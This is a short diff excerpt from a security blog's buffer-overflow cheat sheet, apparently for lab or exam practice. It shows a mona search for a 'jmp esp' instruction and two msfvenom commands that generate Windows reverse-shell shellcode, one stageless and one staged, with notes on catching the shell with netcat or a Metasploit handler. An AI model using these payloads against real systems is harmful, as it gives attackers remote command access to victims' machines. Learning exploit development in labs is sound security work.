krnb/noobsecblog/source/_posts/bof.md

 # try selecting an application specific DLL instead of OS
 !mona jmp -r esp -cpb '\x00'

+# Do	NOT	add an encoder by yourself, let msfvenom decide that
+# [Recommended, reasons at the bottom] Stageless - use nc to connect to this shell
 msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -b '\x00' -f python --var-name shellcode EXITFUNC=thread

+# Do	NOT	add an encoder by yourself, let msfvenom decide that
+# Staged - use multi/handler to connect to this shell
+msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=443 -b '\x00' -f python --var-name shellcode EXITFUNC=thread
 ```

 ## cheatsheet.py